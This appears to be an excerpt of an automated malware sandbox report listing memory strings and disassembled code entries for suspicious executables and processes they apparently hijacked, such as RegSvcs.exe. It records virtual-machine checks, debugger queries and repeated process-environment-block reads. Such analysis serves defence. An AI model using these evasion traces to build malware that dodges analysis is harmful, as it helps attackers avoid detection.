            Source: snTlRrBza.exe, 00000007.00000002.2036842591.0000000005C02000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
            Source: JeouiaPf03mHSBH.exe, 00000000.00000002.1775941369.0000000005B83000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
            Source: SearchIndexer.exe, 00000011.00000002.2924136902.0000000002A9C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll2
            Source: snTlRrBza.exe, 00000007.00000002.2036842591.0000000005C02000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\g
            Source: qRurKwDVhn.exe, 00000014.00000002.2924838468.0000000000B2F000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000016.00000002.2624739191.000001F56E7DE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exe Process information queried: ProcessInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process queried: DebugPort
            Source: C:\Windows\SysWOW64\SearchIndexer.exe Process queried: DebugPort
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_004179B3 LdrLoadDll, 6_2_004179B3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_01578158 mov eax, dword ptr fs:[00000030h] 6_2_01578158
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_01574144 mov eax, dword ptr fs:[00000030h] 6_2_01574144
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_01574144 mov ecx, dword ptr fs:[00000030h] 6_2_01574144
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_014E6154 mov eax, dword ptr fs:[00000030h] 6_2_014E6154
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_014DC156 mov eax, dword ptr fs:[00000030h] 6_2_014DC156
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_0158A118 mov ecx, dword ptr fs:[00000030h] 6_2_0158A118
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_0158A118 mov eax, dword ptr fs:[00000030h] 6_2_0158A118
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_015A0115 mov eax, dword ptr fs:[00000030h] 6_2_015A0115
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_0158E10E mov eax, dword ptr fs:[00000030h] 6_2_0158E10E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_0158E10E mov ecx, dword ptr fs:[00000030h] 6_2_0158E10E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_01510124 mov eax, dword ptr fs:[00000030h] 6_2_01510124
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_0155E1D0 mov eax, dword ptr fs:[00000030h] 6_2_0155E1D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_0155E1D0 mov ecx, dword ptr fs:[00000030h] 6_2_0155E1D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_015A61C3 mov eax, dword ptr fs:[00000030h] 6_2_015A61C3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_015101F8 mov eax, dword ptr fs:[00000030h] 6_2_015101F8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_015B61E5 mov eax, dword ptr fs:[00000030h] 6_2_015B61E5
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_0156019F mov eax, dword ptr fs:[00000030h] 6_2_0156019F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_0159C188 mov eax, dword ptr fs:[00000030h] 6_2_0159C188
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_01520185 mov eax, dword ptr fs:[00000030h] 6_2_01520185
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_01584180 mov eax, dword ptr fs:[00000030h] 6_2_01584180
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_014DA197 mov eax, dword ptr fs:[00000030h] 6_2_014DA197
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_01566050 mov eax, dword ptr fs:[00000030h] 6_2_01566050
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_014E2050 mov eax, dword ptr fs:[00000030h] 6_2_014E2050
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_0150C073 mov eax, dword ptr fs:[00000030h] 6_2_0150C073
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_01564000 mov ecx, dword ptr fs:[00000030h] 6_2_01564000
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_01582000 mov eax, dword ptr fs:[00000030h] 6_2_01582000
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_014FE016 mov eax, dword ptr fs:[00000030h] 6_2_014FE016
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_01576030 mov eax, dword ptr fs:[00000030h] 6_2_01576030
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_014DA020 mov eax, dword ptr fs:[00000030h] 6_2_014DA020
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_014DC020 mov eax, dword ptr fs:[00000030h] 6_2_014DC020
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_015620DE mov eax, dword ptr fs:[00000030h] 6_2_015620DE
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_015220F0 mov ecx, dword ptr fs:[00000030h] 6_2_015220F0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_014E80E9 mov eax, dword ptr fs:[00000030h] 6_2_014E80E9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_014DA0E3 mov ecx, dword ptr fs:[00000030h] 6_2_014DA0E3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_015660E0 mov eax, dword ptr fs:[00000030h] 6_2_015660E0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_014DC0F0 mov eax, dword ptr fs:[00000030h] 6_2_014DC0F0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_014E208A mov eax, dword ptr fs:[00000030h] 6_2_014E208A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_015A60B8 mov eax, dword ptr fs:[00000030h] 6_2_015A60B8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_015A60B8 mov ecx, dword ptr fs:[00000030h] 6_2_015A60B8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_015780A8 mov eax, dword ptr fs:[00000030h] 6_2_015780A8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_015AA352 mov eax, dword ptr fs:[00000030h] 6_2_015AA352
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_01588350 mov ecx, dword ptr fs:[00000030h] 6_2_01588350
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_0156035C mov eax, dword ptr fs:[00000030h] 6_2_0156035C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_0156035C mov ecx, dword ptr fs:[00000030h] 6_2_0156035C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_01562349 mov eax, dword ptr fs:[00000030h] 6_2_01562349
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_0158437C mov eax, dword ptr fs:[00000030h] 6_2_0158437C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_01500310 mov ecx, dword ptr fs:[00000030h] 6_2_01500310
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_0151A30B mov eax, dword ptr fs:[00000030h] 6_2_0151A30B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_014DC310 mov ecx, dword ptr fs:[00000030h] 6_2_014DC310
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_0158E3DB mov eax, dword ptr fs:[00000030h] 6_2_0158E3DB
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_0158E3DB mov ecx, dword ptr fs:[00000030h] 6_2_0158E3DB
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_015843D4 mov eax, dword ptr fs:[00000030h] 6_2_015843D4
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_014EA3C0 mov eax, dword ptr fs:[00000030h] 6_2_014EA3C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_014E83C0 mov eax, dword ptr fs:[00000030h] 6_2_014E83C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_0159C3CD mov eax, dword ptr fs:[00000030h] 6_2_0159C3CD
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_015663C0 mov eax, dword ptr fs:[00000030h] 6_2_015663C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_014F03E9 mov eax, dword ptr fs:[00000030h] 6_2_014F03E9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_015163FF mov eax, dword ptr fs:[00000030h] 6_2_015163FF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_014FE3F0 mov eax, dword ptr fs:[00000030h] 6_2_014FE3F0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_014DE388 mov eax, dword ptr fs:[00000030h] 6_2_014DE388
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_014D8397 mov eax, dword ptr fs:[00000030h] 6_2_014D8397
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_0150438F mov eax, dword ptr fs:[00000030h] 6_2_0150438F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_0159A250 mov eax, dword ptr fs:[00000030h] 6_2_0159A250
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_01568243 mov eax, dword ptr fs:[00000030h] 6_2_01568243
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01568243 mov ecx, dword ptr fs:[00000030h]6_2_01568243
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_014E6259 mov eax, dword ptr fs:[00000030h]6_2_014E6259
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_014DA250 mov eax, dword ptr fs:[00000030h]6_2_014DA250
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_014D826B mov eax, dword ptr fs:[00000030h]6_2_014D826B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01590274 mov eax, dword ptr fs:[00000030h]6_2_01590274
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01590274 mov eax, dword ptr fs:[00000030h]6_2_01590274
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01590274 mov eax, dword ptr fs:[00000030h]6_2_01590274
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01590274 mov eax, dword ptr fs:[00000030h]6_2_01590274
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01590274 mov eax, dword ptr fs:[00000030h]6_2_01590274
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01590274 mov eax, dword ptr fs:[00000030h]6_2_01590274
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01590274 mov eax, dword ptr fs:[00000030h]6_2_01590274
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01590274 mov eax, dword ptr fs:[00000030h]6_2_01590274
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01590274 mov eax, dword ptr fs:[00000030h]6_2_01590274
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01590274 mov eax, dword ptr fs:[00000030h]6_2_01590274
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01590274 mov eax, dword ptr fs:[00000030h]6_2_01590274
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01590274 mov eax, dword ptr fs:[00000030h]6_2_01590274
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_014E4260 mov eax, dword ptr fs:[00000030h]6_2_014E4260
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_014E4260 mov eax, dword ptr fs:[00000030h]6_2_014E4260
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_014E4260 mov eax, dword ptr fs:[00000030h]6_2_014E4260
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_014D823B mov eax, dword ptr fs:[00000030h]6_2_014D823B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_014EA2C3 mov eax, dword ptr fs:[00000030h]6_2_014EA2C3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_014EA2C3 mov eax, dword ptr fs:[00000030h]6_2_014EA2C3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_014EA2C3 mov eax, dword ptr fs:[00000030h]6_2_014EA2C3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_014EA2C3 mov eax, dword ptr fs:[00000030h]6_2_014EA2C3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_014EA2C3 mov eax, dword ptr fs:[00000030h]6_2_014EA2C3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_014F02E1 mov eax, dword ptr fs:[00000030h]6_2_014F02E1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_014F02E1 mov eax, dword ptr fs:[00000030h]6_2_014F02E1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_014F02E1 mov eax, dword ptr fs:[00000030h]6_2_014F02E1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01560283 mov eax, dword ptr fs:[00000030h]6_2_01560283
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01560283 mov eax, dword ptr fs:[00000030h]6_2_01560283
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01560283 mov eax, dword ptr fs:[00000030h]6_2_01560283
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0151E284 mov eax, dword ptr fs:[00000030h]6_2_0151E284
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0151E284 mov eax, dword ptr fs:[00000030h]6_2_0151E284
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_014F02A0 mov eax, dword ptr fs:[00000030h]6_2_014F02A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_014F02A0 mov eax, dword ptr fs:[00000030h]6_2_014F02A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015762A0 mov eax, dword ptr fs:[00000030h]6_2_015762A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015762A0 mov ecx, dword ptr fs:[00000030h]6_2_015762A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015762A0 mov eax, dword ptr fs:[00000030h]6_2_015762A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015762A0 mov eax, dword ptr fs:[00000030h]6_2_015762A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015762A0 mov eax, dword ptr fs:[00000030h]6_2_015762A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015762A0 mov eax, dword ptr fs:[00000030h]6_2_015762A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_014E8550 mov eax, dword ptr fs:[00000030h]6_2_014E8550
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_014E8550 mov eax, dword ptr fs:[00000030h]6_2_014E8550
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0151656A mov eax, dword ptr fs:[00000030h]6_2_0151656A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0151656A mov eax, dword ptr fs:[00000030h]6_2_0151656A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0151656A mov eax, dword ptr fs:[00000030h]6_2_0151656A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01576500 mov eax, dword ptr fs:[00000030h]6_2_01576500
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015B4500 mov eax, dword ptr fs:[00000030h]6_2_015B4500
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015B4500 mov eax, dword ptr fs:[00000030h]6_2_015B4500
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015B4500 mov eax, dword ptr fs:[00000030h]6_2_015B4500
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015B4500 mov eax, dword ptr fs:[00000030h]6_2_015B4500
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015B4500 mov eax, dword ptr fs:[00000030h]6_2_015B4500
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015B4500 mov eax, dword ptr fs:[00000030h]6_2_015B4500
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015B4500 mov eax, dword ptr fs:[00000030h]6_2_015B4500
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0150E53E mov eax, dword ptr fs:[00000030h]6_2_0150E53E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0150E53E mov eax, dword ptr fs:[00000030h]6_2_0150E53E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0150E53E mov eax, dword ptr fs:[00000030h]6_2_0150E53E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0150E53E mov eax, dword ptr fs:[00000030h]6_2_0150E53E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0150E53E mov eax, dword ptr fs:[00000030h]6_2_0150E53E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_014F0535 mov eax, dword ptr fs:[00000030h]6_2_014F0535
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_014F0535 mov eax, dword ptr fs:[00000030h]6_2_014F0535
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_014F0535 mov eax, dword ptr fs:[00000030h]6_2_014F0535
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_014F0535 mov eax, dword ptr fs:[00000030h]6_2_014F0535
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_014F0535 mov eax, dword ptr fs:[00000030h]6_2_014F0535
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_014F0535 mov eax, dword ptr fs:[00000030h]6_2_014F0535
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0151A5D0 mov eax, dword ptr fs:[00000030h]6_2_0151A5D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0151A5D0 mov eax, dword ptr fs:[00000030h]6_2_0151A5D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0151E5CF mov eax, dword ptr fs:[00000030h]6_2_0151E5CF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0151E5CF mov eax, dword ptr fs:[00000030h]6_2_0151E5CF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_014E65D0 mov eax, dword ptr fs:[00000030h]6_2_014E65D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_014E25E0 mov eax, dword ptr fs:[00000030h]6_2_014E25E0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0150E5E7 mov eax, dword ptr fs:[00000030h]6_2_0150E5E7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0150E5E7 mov eax, dword ptr fs:[00000030h]6_2_0150E5E7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0150E5E7 mov eax, dword ptr fs:[00000030h]6_2_0150E5E7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0150E5E7 mov eax, dword ptr fs:[00000030h]6_2_0150E5E7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0150E5E7 mov eax, dword ptr fs:[00000030h]6_2_0150E5E7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0150E5E7 mov eax, dword ptr fs:[00000030h]6_2_0150E5E7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0150E5E7 mov eax, dword ptr fs:[00000030h]6_2_0150E5E7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0150E5E7 mov eax, dword ptr fs:[00000030h]6_2_0150E5E7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0151C5ED mov eax, dword ptr fs:[00000030h]6_2_0151C5ED
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0151C5ED mov eax, dword ptr fs:[00000030h]6_2_0151C5ED
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_014E2582 mov eax, dword ptr fs:[00000030h]6_2_014E2582
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_014E2582 mov ecx, dword ptr fs:[00000030h]6_2_014E2582
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0151E59C mov eax, dword ptr fs:[00000030h]6_2_0151E59C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01514588 mov eax, dword ptr fs:[00000030h]6_2_01514588
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015045B1 mov eax, dword ptr fs:[00000030h]6_2_015045B1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015045B1 mov eax, dword ptr fs:[00000030h]6_2_015045B1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015605A7 mov eax, dword ptr fs:[00000030h]6_2_015605A7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015605A7 mov eax, dword ptr fs:[00000030h]6_2_015605A7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015605A7 mov eax, dword ptr fs:[00000030h]6_2_015605A7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0150245A mov eax, dword ptr fs:[00000030h]6_2_0150245A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0159A456 mov eax, dword ptr fs:[00000030h]6_2_0159A456
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_014D645D mov eax, dword ptr fs:[00000030h]6_2_014D645D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0151E443 mov eax, dword ptr fs:[00000030h]6_2_0151E443
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0151E443 mov eax, dword ptr fs:[00000030h]6_2_0151E443
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0151E443 mov eax, dword ptr fs:[00000030h]6_2_0151E443
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0151E443 mov eax, dword ptr fs:[00000030h]6_2_0151E443
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0151E443 mov eax, dword ptr fs:[00000030h]6_2_0151E443
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0151E443 mov eax, dword ptr fs:[00000030h]6_2_0151E443
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0151E443 mov eax, dword ptr fs:[00000030h]6_2_0151E443
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0151E443 mov eax, dword ptr fs:[00000030h]6_2_0151E443
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0150A470 mov eax, dword ptr fs:[00000030h]6_2_0150A470
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0150A470 mov eax, dword ptr fs:[00000030h]6_2_0150A470
